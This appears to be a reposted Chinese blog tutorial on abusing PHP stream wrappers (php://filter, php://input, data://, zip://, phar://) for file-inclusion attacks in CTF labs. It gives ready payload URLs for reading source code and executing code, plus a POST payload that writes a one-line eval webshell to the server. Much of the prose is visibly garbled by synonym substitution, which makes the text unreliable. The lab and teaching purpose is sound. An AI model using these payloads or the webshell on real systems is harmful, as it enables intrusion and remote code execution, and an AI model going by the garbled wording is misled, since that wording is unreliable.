PHP学习_PHP伪协议大总结【欢迎收藏】

2021-09-10 0 348 百度已收录

 

file:// 和谈

  • 前提
    • allow_url_fopen:off/on
    • allow_url_include :off/on
  • 感化
    用于拜访当地文件零碎,正在CTF中凡是用来读取当地文件的且没有受allow_url_fopenallow_url_include的影响。
    include()/require()/include_once()/require_once()参数可控的状况下,如导入为非.php文件,则仍依照php语法停止剖析,这是include()函数所决议的。
  • 说明
    file:// 文件零碎是 PHP 运用的默许封装和谈,展示了当地文件零碎。当指定了一个绝对途径(没有以/、、\\或者 Windows 盘符扫尾的途径)供给的途径将基于以后的任务目次。正在良多状况下是剧本地点的目次,除了非被修正了。运用 CLI 的时分,目次默许是剧本被挪用时地点的目次。正在某些函数里,比方 fopen() 以及 file_get_contents()include_path 会可选地搜刮,也作为绝对的途径。
  • 用法
    /path/to/file.ext
    relative/path/to/file.ext
    fileInCwd.ext
    C:/path/to/winfile.ext
    C:\\path\\to\\winfile.ext
    \\\\smbserver\\share\\path\\to\\winfile.ext
    file:///path/to/file.ext
  • 示例
    1. file://[文件的相对途径以及文件名]
      http://127.0.0.1/include.php?file=file://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.txt

      PHP学习_PHP伪协议大总结【欢迎收藏】

    2. [文件的绝对途径以及文件名]
      http://127.0.0.1/include.php?file=./phpinfo.txt

      PHP学习_PHP伪协议大总结【欢迎收藏】

    3. [http://收集途径以及文件名]
      http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

      PHP学习_PHP伪协议大总结【欢迎收藏】

  • 参考:http://php.net/manual/zh/wrappers.file.php

php:// 和谈

  • 前提
    • allow_url_fopen:off/on
    • allow_url_include :仅php://input php://stdin php://memory php://temp 需求on
  • 感化
    php:// 拜访各个输出/输入流(I/O streams),正在CTF中常常运用的是php://filter以及php://inputphp://filter用于读取源码php://input用于履行php代码
  • 说明
    PHP 供给了一些杂项输出/输入(IO)流,答应拜访 PHP 的输出输入流、规范输出输入以及过错描绘符,
    内存中、磁盘备份的暂时文件流和能够操纵其余读取写入文件资本的过滤器。

    和谈 感化
    php://input 能够拜访恳求的原始数据的只读流,正在POST恳求中拜访POST的data局部,正在enctype="multipart/form-data" 的时分php://input 是有效的。
    php://output 只写的数据流,答应以 print 以及 echo 同样的体式格局写入到输入缓冲区。
    php://fd (>=5.3.6)答应间接拜访指定的文件描绘符。比方 php://fd/3 援用了文件描绘符 3。
    php://memory php://temp (>=5.1.0)一个相似文件包装器的数据流,答应读写暂时数据。二者的独一差别是 php://memory 老是把数据贮存正在内存中,而 php://temp 会正在内存量到达预约义的限定后(默许是 2MB)存入暂时文件中。暂时文件地位的决议以及 sys_get_temp_dir() 的体式格局分歧。
    php://filter (>=5.0.0)一种元封装器,计划用于数据流翻开时的挑选过滤使用。关于一体式(all-in-one)的文件函数十分有效,相似 readfile()file() 以及 file_get_contents(),正在数据流内容读取以前不时机使用其余过滤器。
  • php://filter参数详解该和谈的参数会正在该和谈途径长进行传送,多个参数均可以正在一个途径上传送。详细参考以下:
    php://filter 参数 描绘
    resource=<要过滤的数据流> 必需项。它指定了你要挑选过滤的数据流。
    read=<读链的过滤器> 可选项。能够设定一个或者多个过滤器称号,以管道符(*\\ *)分开。
    write=<写链的过滤器> 可选项。能够设定一个或者多个过滤器称号,以管道符(\\ )分开。
    <; 两个链的过滤器> 任何不以 read= 或者 write= 作前缀的挑选器列表会视状况使用于读或者写链。
  • 可用的过滤器列表(4类)此处罗列次要的过滤器范例,具体内容请参考:https://www.php.net/manual/zh/filters.php
    字符串过滤器 感化
    string.rot13 同等于str_rot13(),rot13变更
    string.toupper 同等于strtoupper(),转年夜写字母
    string.tolower 同等于strtolower(),转小写字母
    string.strip_tags 同等于strip_tags()去除了html、PHP言语标签
    转换过滤器 感化
    convert.base64-encode & convert.base64-decode 同等于base64_encode()以及base64_decode(),base64编码解码
    convert.quoted-printable-encode & convert.quoted-printable-decode quoted-printable 字符串与 8-bit 字符串编码解码
    紧缩过滤器 感化
    zlib.deflate & zlib.inflate 正在当地文件零碎中创立 gzip 兼容文件的办法,但没有发生饬令行东西如 gzip的头以及尾信息。只是紧缩息争压数据流中的无效载荷局部。
    bzip2.compress & bzip2.decompress 同上,正在当地文件零碎中创立 bz2 兼容文件的办法。
    加密过滤器 感化
    mcrypt.* libmcrypt 对于称加密算法
    mdecrypt.* libmcrypt 对于称解密算法
  • 示例
    1. php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对于php文件需求base64编码)
      http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

      PHP学习_PHP伪协议大总结【欢迎收藏】

    2. php://input + [POST DATA]履行php代码
      http://127.0.0.1/include.php?file=php://input
      [POST DATA局部]
      <?php phpinfo(); ?>

      PHP学习_PHP伪协议大总结【欢迎收藏】

      如有写入权限,写入一句话木马

      http://127.0.0.1/include.php?file=php://input
      [POST DATA局部]
      <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

      PHP学习_PHP伪协议大总结【欢迎收藏】

  • 参考:https://php.net/manual/zh/wrappers.php.php

zip:// & bzip2:// & zlib:// 和谈

  • 前提
    • allow_url_fopen:off/on
    • allow_url_include :off/on
  • 感化zip:// & bzip2:// & zlib:// 均属于紧缩流,能够拜访紧缩文件中的子文件,更紧张的是没有需求指定后缀名,可修正为恣意后缀:jpg png gif xxx 等等。
  • 示例
    1. zip://[紧缩文件相对途径]%23[紧缩文件内的子文件名](#编码为%23)紧缩 phpinfo.txt 为 phpinfo.zip ,紧缩包重定名为 phpinfo.jpg ,并上传
      http://127.0.0.1/include.php?file=zip://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.jpg%23phpinfo.txt

      PHP学习_PHP伪协议大总结【欢迎收藏】

    2. compress.bzip2://file.bz2紧缩 phpinfo.txt 为 phpinfo.bz2 并上传(异样撑持恣意后缀名)
      http://127.0.0.1/include.php?file=compress.bzip2://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.bz2

      PHP学习_PHP伪协议大总结【欢迎收藏】

    3. compress.zlib://file.gz紧缩 phpinfo.txt 为 phpinfo.gz 并上传(异样撑持恣意后缀名)
      http://127.0.0.1/include.php?file=compress.zlib://E:\\phpStudy\\PHPTutorial\\WWW\\phpinfo.gz

      PHP学习_PHP伪协议大总结【欢迎收藏】

  • 参考:http://php.net/manual/zh/wrappers.compression.php

data:// 和谈

  • 前提
    • allow_url_fopen:on
    • allow_url_include :on
  • 感化:自PHP>=5.2.0起,可使用data://数据流封装器,以传送响应格局的数据。凡是能够用来履行PHP代码。
  • 用法
    data://text/plain,
    data://text/plain;base64,
  • 示例
    1. data://text/plain,
      http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

      PHP学习_PHP伪协议大总结【欢迎收藏】

    2. data://text/plain;base64,
      http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

      PHP学习_PHP伪协议大总结【欢迎收藏】

http:// & https:// 和谈

  • 前提
    • allow_url_fopen:on
    • allow_url_include :on
  • 感化:惯例 URL 方式,答应经过 HTTP 1.0 的 GET办法,以只读拜访文件或者资本。CTF中凡是用于近程包括。
  • 用法
    http://example.com
    http://example.com/file.php?var1=val1&var2=val2
    http://user:password@example.com
    https://example.com
    https://example.com/file.php?var1=val1&var2=val2
    https://user:password@example.com
  • 示例
    http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

    PHP学习_PHP伪协议大总结【欢迎收藏】

phar:// 和谈

phar://和谈与zip://相似,异样能够拜访zip格局紧缩包内容,正在这里只给出一个示例:

http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

PHP学习_PHP伪协议大总结【欢迎收藏】

别的正在 Black Hat 2018 年夜会上,研讨职员发布了一款针对于PHP使用顺序的全新打击技能:phar://和谈工具注入技能

由于该应用点需求满意必定的前提才干应用,能够参考上面这篇文章,外面的demo也十分具体,留作当前特地研讨一下。

以上便是PHP伪和谈年夜总结【欢送珍藏】的具体内容,更多请存眷酷吧易资源网别的相关文章!

 

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

酷吧易资源网 PHP教程 PHP学习_PHP伪协议大总结【欢迎收藏】 https://www.kubayi.com/7664.html

常见问题

相关文章

评论
暂无评论